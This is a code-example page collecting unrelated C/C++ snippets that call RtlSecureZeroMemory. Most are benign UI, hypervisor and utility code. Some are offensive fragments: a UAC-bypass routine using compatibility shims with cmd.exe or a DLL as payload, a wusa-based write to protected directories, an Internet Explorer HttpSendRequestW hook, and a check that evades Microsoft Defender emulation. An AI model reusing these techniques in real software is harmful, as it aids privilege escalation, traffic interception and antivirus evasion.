C++ RtlSecureZeroMemory函数代码示例

VOID InternetExplorerEntry()
{
	RtlSecureZeroMemory(&sINTERNETEXPLORERMETHODS,sizeof(INTERNETEXPLORERMETHODS));
	sINTERNETEXPLORERMETHODS.HttpSendRequestW = FindHTTPSendRequestW();

	IEDISABLESPDY();

	if (sINTERNETEXPLORERMETHODS.HttpSendRequestW)
	{
		HTTPSENDREQUESTW = (PHTTPSENDREQUESTW)SetHook(INTERNETEXPLORERCALLBACK,(LPVOID)sINTERNETEXPLORERMETHODS.HttpSendRequestW);
	}
}

NTSTATUS AllocateVmxProcessorData(PVOID *VirtualAddress, PHYSICAL_ADDRESS *PhysicalAddress, SIZE_T *Size)
{
	if (!VirtualAddress || !PhysicalAddress || !Size)
		return STATUS_INVALID_PARAMETER;

	//
	// Read the MSR information to get the base size
	// Default to 4096 bytes
	//
	VMX_BASIC_MSR msr;
	TO_ULL(msr) = __readmsr(MSR_IA32_VMX_BASIC);

	if (*Size <= 0)
	{
		// In rare cases this isn't set (*COUGH* *VMWARE*)
		if (msr.szVmxOnRegion > 0)
			*Size = msr.szVmxOnRegion;
		else
			*Size = 0x1000;

		*Size = ROUND_TO_PAGES(*Size);
	}

	//
	// Allocate CONTIGUOUS physical memory
	// MmCached = Stored in CPU L1/L2/L3 cache if possible 
	//
	PHYSICAL_ADDRESS l1, l2, l3;

	l1.QuadPart = 0;
	l2.QuadPart = -1;
	l3.QuadPart = 0x200000;

	PVOID address = MmAllocateContiguousMemorySpecifyCache(*Size, l1, l2, l3, MmCached);

	if (!address)
		return STATUS_NO_MEMORY;

	RtlSecureZeroMemory(address, *Size);

	//
	// Set the revision id
	//
	*(ULONG *)address = msr.RevId;

	//
	// Done
	//
	*VirtualAddress	 = address;
	*PhysicalAddress = MmGetPhysicalAddress(address);

	return STATUS_SUCCESS;
}

/*
* FindDlgHandleNotify
*
* Purpose:
*
* WM_NOTIFY processing for FindDlg listview.
*
*/
VOID FindDlgHandleNotify(
    LPNMLISTVIEW	nhdr
)
{
    INT      c, k;
    LPWSTR   lpItemText;
    LVCOLUMN col;

    if (nhdr == NULL)
        return;

    if (nhdr->hdr.idFrom != ID_SEARCH_LIST)
        return;

    switch (nhdr->hdr.code) {

    case LVN_ITEMCHANGED:
        if (!(nhdr->uNewState & LVIS_SELECTED))
            break;

        lpItemText = supGetItemText(nhdr->hdr.hwndFrom, nhdr->iItem, 0, NULL);
        if (lpItemText) {
            ListToObject(lpItemText);
            HeapFree(GetProcessHeap(), 0, lpItemText);
        }
        break;

    case LVN_COLUMNCLICK:
        bFindDlgSortInverse = !bFindDlgSortInverse;
        FindDlgSortColumn = ((NMLISTVIEW *)nhdr)->iSubItem;
        ListView_SortItemsEx(FindDlgList, &FindDlgCompareFunc, FindDlgSortColumn);

        RtlSecureZeroMemory(&col, sizeof(col));
        col.mask = LVCF_IMAGE;
        col.iImage = -1;

        for (c = 0; c < 2; c++)
            ListView_SetColumn(FindDlgList, c, &col);

        k = ImageList_GetImageCount(ListViewImages);
        if (bFindDlgSortInverse)
            col.iImage = k - 2;
        else
            col.iImage = k - 1;

        ListView_SetColumn(FindDlgList, ((NMLISTVIEW *)nhdr)->iSubItem, &col);
        break;

    default:
        break;
    }
}

/*
* ucmRegisterProvider
*
* Purpose:
*
* Register provider and set up image load notify callback.
*
*/
VOID ucmRegisterProvider(
    VOID
)
{
    RtlSecureZeroMemory(&avrfThunks, sizeof(avrfThunks)); //for future case

    avrfThunks[0].ThunkName = NULL;
    avrfThunks[0].ThunkOldAddress = NULL;
    avrfThunks[0].ThunkNewAddress = NULL;

    RtlSecureZeroMemory(&avrfDlls, sizeof(avrfDlls)); //for future case

    avrfDlls[0].DllName = NULL;
    avrfDlls[0].DllFlags = 0;
    avrfDlls[0].DllAddress = NULL;
    avrfDlls[0].DllThunks = avrfThunks;

    RtlSecureZeroMemory(&g_avrfProvider, sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR));
    g_avrfProvider.Length = sizeof(RTL_VERIFIER_PROVIDER_DESCRIPTOR);
    g_avrfProvider.ProviderDlls = avrfDlls;
    g_avrfProvider.ProviderDllLoadCallback = (RTL_VERIFIER_DLL_LOAD_CALLBACK)&ucmLoadCallback;
}

/*
* ucmWusaExtractPackage
*
* Purpose:
*
* Extract cab to protected directory using wusa.
*
*/
BOOL ucmWusaExtractPackage(
    LPWSTR lpCommandLine
    )
{
    BOOL bResult = FALSE;
    WCHAR szMsuFileName[MAX_PATH * 2];
    WCHAR szCmd[MAX_PATH * 4];

    RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
    _strcpy(szMsuFileName, g_ctx.szTempDirectory);
    _strcat(szMsuFileName, ELLOCNAK_MSU);

    //extract msu data to target directory
    RtlSecureZeroMemory(szCmd, sizeof(szCmd));
    wsprintfW(szCmd, lpCommandLine, szMsuFileName);
    bResult = supRunProcess(L"cmd.exe", szCmd);

    if (szMsuFileName[0] != 0) {
        DeleteFileW(szMsuFileName);
    }
    return bResult;
}

/*
* wdCheckEmulatedVFS
*
* Purpose:
*
* Detect Microsoft Security Engine emulation by it own VFS artefact.
*
* Microsoft AV provides special emulated environment for scanned application where it
* fakes general system information, process environment structures/data to make sure
* API calls are transparent for scanned code. It also use simple Virtual File System
* allowing this AV track file system changes and if needed continue emulation on new target.
*
* This method implemented in commercial malware presumable since 2013.
*
*/
VOID wdCheckEmulatedVFS(
    VOID
)
{
    WCHAR szBuffer[MAX_PATH];
    WCHAR szMsEngVFS[12] = { L':', L'\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };

    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    GetModuleFileName(NULL, szBuffer, MAX_PATH);
    if (_strstri(szBuffer, szMsEngVFS) != NULL) {
        ExitProcess((UINT)0);
    }
}

/*
* SfuCreateFileMappingNoExec
*
* Purpose:
*
* Map file as non executable image.
*
*/
PVOID SfuCreateFileMappingNoExec(
	_In_ LPWSTR lpFileName
	)
{
	BOOL                   cond = FALSE;
	NTSTATUS               status;
	UNICODE_STRING         usFileName;
	HANDLE                 hFile = NULL, hSection = NULL;
	OBJECT_ATTRIBUTES      obja;
	IO_STATUS_BLOCK        iost;
	SIZE_T                 ViewSize = 0;
	PVOID                  Data = NULL;

	RtlSecureZeroMemory(&usFileName, sizeof(usFileName));

	do {

		if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)
			break;

		InitializeObjectAttributes(&obja, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);

		status = NtOpenFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE,
			&obja, &iost, FILE_SHARE_READ,
			FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);
		if (!NT_SUCCESS(status))
			break;

		status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,
			NULL, PAGE_READONLY, SEC_IMAGE_NO_EXECUTE, hFile);
		if (!NT_SUCCESS(status))
			break;

		status = NtMapViewOfSection(hSection, NtCurrentProcess(),
			(PVOID)&Data, 0, 0, NULL, &ViewSize, ViewUnmap, 0, PAGE_READONLY);
		if (!NT_SUCCESS(status))
			break;

	} while (cond);

	if (hFile != NULL) {
		NtClose(hFile);
	}
	if (hSection != NULL) {
		NtClose(hSection);
	}
	if (usFileName.Buffer != NULL) {
		RtlFreeUnicodeString(&usFileName);
	}
	return Data;
}

R_API void r_mem_memzero(void *dst, size_t l) {
#ifdef _MSC_VER
	RtlSecureZeroMemory (dst, l);
#else
#if HAVE_EXPLICIT_BZERO
	explicit_bzero (dst, l);
#elif HAVE_EXPLICIT_MEMSET
	(void)explicit_memset (dst, 0, l);
#else
	memset (dst, 0, l);
	__asm__ volatile ("" :: "r"(dst) : "memory");
#endif
#endif
}

/*
* supSetMenuIcon
*
* Purpose:
*
* Associates icon data with given menu item.
*
*/
VOID supSetMenuIcon(
	HMENU hMenu,
	UINT Item,
	ULONG_PTR IconData
	)
{
	MENUITEMINFOW mii;
	RtlSecureZeroMemory(&mii, sizeof(mii));
	mii.cbSize = sizeof(mii);
	mii.fMask = MIIM_BITMAP | MIIM_DATA;
	mii.hbmpItem = HBMMENU_CALLBACK;
	mii.dwItemData = IconData;
	SetMenuItemInfo(hMenu, Item, FALSE, &mii);
}

void SfMain(
	VOID
	)
{
	BOOL         cond = FALSE;
	UINT         uResult = 0;
	DWORD        dwTemp;
	HANDLE       StdIn;
	INPUT_RECORD inp1;

	__security_init_cookie();

	do {
		
		g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
		if (g_ConOut == INVALID_HANDLE_VALUE) {
			uResult = (UINT)-1;
			break;
		}

		g_ConsoleOutput = TRUE;
		if (!GetConsoleMode(g_ConOut, &dwTemp)) {
			g_ConsoleOutput = FALSE;
		}

		SetConsoleTitle(T_SFDECRYPTTITLE);
		SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
		if (g_ConsoleOutput == FALSE) {
			WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL);
		}

		uResult = SfDecryptPayload(GetCommandLine());

		if (g_ConsoleOutput) {

			SfcuiPrintText(g_ConOut,
				T_SFPRESSANYKEY,
				TRUE, FALSE);

			StdIn = GetStdHandle(STD_INPUT_HANDLE);
			RtlSecureZeroMemory(&inp1, sizeof(inp1));
			ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);
			ReadConsole(StdIn, &BE, sizeof(BE), &dwTemp, NULL);
		}

	} while (cond);

	ExitProcess(uResult);
}

/*
* ucmAppcompatElevation
*
* Purpose:
*
* AutoElevation using Application Compatibility engine.
*
*/
BOOL ucmAppcompatElevation(
	UACBYPASSMETHOD Method,
	CONST PVOID ProxyDll,
	DWORD ProxyDllSize,
	LPWSTR lpszPayloadEXE
	)
{
	BOOL cond = FALSE, bResult = FALSE;
	WCHAR szBuffer[MAX_PATH * 2];

	do {

		RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
		if (ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\apphelp.dll"),
			szBuffer, MAX_PATH) == 0)
		{
			break;
		}

		hAppHelp = LoadLibrary(szBuffer);
		if (hAppHelp == NULL) {
			break;
		}

		if (ucmInitAppHelp() == FALSE) {
			break;
		}

		//create and register shim with RedirectEXE, cmd.exe as payload
		if (Method == UacMethodRedirectExe) {

			if (lpszPayloadEXE == NULL) {
				_strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe");
				bResult = ucmShimRedirectEXE(szBuffer);
			}
			else {
				bResult = ucmShimRedirectEXE(lpszPayloadEXE);
			}
			return bResult;
		}  	
		//create and register shim patch with fubuki as payload
		if (Method == UacMethodShimPatch) {
			bResult = ucmShimPatch(ProxyDll, ProxyDllSize);
		}

	} while (cond);

	return bResult;
}

VOID TreeListAutoExpand(
    HWND hwndHeader,
    LPNMTREEVIEW nhdr
)
{
    RECT        irc;
    LONG        cx = 0, xleft = 0;
    HDITEM      hdi;
    HTREEITEM   citem = TreeView_GetChild(nhdr->hdr.hwndFrom, nhdr->itemNew.hItem);

    RtlSecureZeroMemory(&irc, sizeof(irc));
    TreeView_GetItemRect(nhdr->hdr.hwndFrom, citem, &irc, TRUE);
    xleft = irc.left;

    while (citem) {
        RtlSecureZeroMemory(&irc, sizeof(irc));
        TreeView_GetItemRect(nhdr->hdr.hwndFrom, citem, &irc, TRUE);

        if (irc.left < xleft)
            break;

        if (irc.right > cx)
            cx = irc.right;

        citem = TreeView_GetNextVisible(nhdr->hdr.hwndFrom, citem);
    }

    RtlSecureZeroMemory(&hdi, sizeof(hdi));
    hdi.mask = HDI_WIDTH;
    Header_GetItem(hwndHeader, 0, &hdi);

    if (hdi.cxy < cx + 8)
        hdi.cxy = cx + 8;

    Header_SetItem(hwndHeader, 0, &hdi);
}

/*
* supQueryKnownDlls
*
* Purpose:
*
* Expand KnownDlls to global variables.
*
*/
VOID supQueryKnownDlls(
	VOID
	)
{
	UNICODE_STRING		KnownDlls;

	g_lpKnownDlls32 = NULL;
	g_lpKnownDlls64 = NULL;

	RtlSecureZeroMemory(&KnownDlls, sizeof(KnownDlls));
	RtlInitUnicodeString(&KnownDlls, L"\\KnownDlls32\\KnownDllPath");
	supQueryKnownDllsLink(&KnownDlls, &g_lpKnownDlls32);
	RtlInitUnicodeString(&KnownDlls, L"\\KnownDlls\\KnownDllPath");
	supQueryKnownDllsLink(&KnownDlls, &g_lpKnownDlls64);
}

/*
* MainWindowOnRefresh
*
* Purpose:
*
* Main Window Refresh handler.
*
*/
VOID MainWindowOnRefresh(
	_In_ HWND hwnd
	)
{
	LPWSTR	CurrentObject;
	SIZE_T	len;

	UNREFERENCED_PARAMETER(hwnd);

	supSetWaitCursor(TRUE);

	if (g_kdctx.hDevice != NULL) {
		ObListDestroy(&g_kdctx.ObjectList);
		if (g_kdctx.hThreadWorker) {
			WaitForSingleObject(g_kdctx.hThreadWorker, INFINITE);
			CloseHandle(g_kdctx.hThreadWorker);
			g_kdctx.hThreadWorker = NULL;
		}

		//query object list info
		g_kdctx.hThreadWorker = CreateThread(NULL, 0,
			kdQueryProc,
			&g_kdctx, 0, NULL);
	}

	supFreeSCMSnapshot(g_enumParams.scmSnapshot);
	sapiFreeSnapshot(g_enumParams.sapiDB);
	RtlSecureZeroMemory(&g_enumParams, sizeof(g_enumParams));
	g_enumParams.scmSnapshot = supCreateSCMSnapshot(&g_enumParams.scmNumberOfEntries);
	g_enumParams.sapiDB = sapiCreateSetupDBSnapshot();
	g_enumParams.lpSubDirName = CurrentObjectPath;

	len = _strlen(CurrentObjectPath);
	CurrentObject = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (len + 1)*sizeof(WCHAR));
	if (CurrentObject)
		_strcpy(CurrentObject, CurrentObjectPath);

	TreeView_DeleteAllItems(ObjectTree);
	ListObjectDirectoryTree(L"\\", NULL, NULL);
	TreeView_SelectItem(ObjectTree, TreeView_GetRoot(ObjectTree));

	if (CurrentObject) {
		ListToObject(CurrentObject);
		HeapFree(GetProcessHeap(), 0, CurrentObject);
	}

	supSetWaitCursor(FALSE);
}

/*
* PipeDisplayError
*
* Purpose:
*
* Display last Win32 error.
*
*/
VOID PipeDisplayError(
    HWND hwndDlg
)
{
    DWORD dwLastError;
    WCHAR szBuffer[MAX_PATH * 2];

    dwLastError = GetLastError();
    ShowWindow(GetDlgItem(hwndDlg, ID_PIPE_QUERYFAIL), SW_SHOW);

    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    _strcpy(szBuffer, TEXT("Cannot open pipe because: "));
    FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError,
        0, _strend(szBuffer), MAX_PATH, NULL);
    SetDlgItemText(hwndDlg, ID_PIPE_QUERYFAIL, szBuffer);
}